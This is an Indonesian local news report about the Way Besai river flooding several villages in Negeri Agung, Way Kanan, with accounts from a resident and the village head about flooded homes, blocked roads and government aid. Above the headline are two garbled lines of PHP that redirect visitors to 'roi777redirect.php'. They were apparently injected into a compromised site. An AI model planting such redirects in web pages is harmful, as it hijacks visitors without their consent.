header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Luapan Sungai Way Besai Hambat Aktivitas Warga Negri Agung -
Luapan Sungai Way Besai Hambat Aktivitas Warga Negri Agung

TRANSLAMPUNG.COM, NEGERI AGUNG – Akibat derasnya guyuran hujan semalaman mengakibatkan Air sungai Way Besai meluap sehingga terjadi Banjir dan menghambat aktivitas warga serta memutus akses jalan di beberapa kampung yang ada di kecamatan Negeri Agung Kabupaten waykanan, Rabu (4/4)

Menurut pantauan Translampung.com dilokasi Banjir, Kampung yang terkena dampak banjir yakni Kampung Gedung meneng, Kotabumi, Kota Baru,Penengahan, Sungsang, Pulau Batu dan Kampung Negeri Agung, Namun banjir yang terparah bahkan sampai menggenangi Rumah Warga terjadi di kampung Pulau batu dan Kampung Negeri Agung.

Burlian, warga Kampung Pulau batu menuturkan datang nya banjir di perkirakan terjadi Subuh tadi Dikampung nya, ketinggian air kurang lebih satu meter sehingga menutup badan jalan dan tidak bisa di lewati kendaraan bermotor maupun mobil serta mengakibatkan aktivitas warga baik itu para pedagang, petani, pelajar tidak dapat melakukan aktivitas seperti biasa nya.

“Menurut informasi saat ini ada kurang lebih 15 Rumah Warga kampung pulau batu dan 20 Rumah Warga kampung Negeri Agung yang terkena langsung genangan banjir Bahkan Rumah pak Boy Hamizar Camat Negeri Agung juga kena Banjir,” Tutur Burlian.

Terpisah, saat di konfirmasi oleh translampung.Com, kepala kampung Negeri Agung, Tyas, mengatakan walaupun sudah berangsur Surut hingga sore ini luapan Air sungai Way Besai masih menggenangi di sejumlah titik diwilayah nya. Atas kejadian Banjir tersebut pihaknya pun sudah melaporkan ke pemerintah Kabupaten waykanan dan langsung mendapat tanggapan.

“Alhamdulillah air sudah mulai surut, saat ini pihak pemerintah melalui BPBD dan Dinas sosial sudah meninjau lokasi dan langsung memberikan Bantuan kepada Warga saya yang terkena Banjir,” pungkasnya. (migo)

News Reporter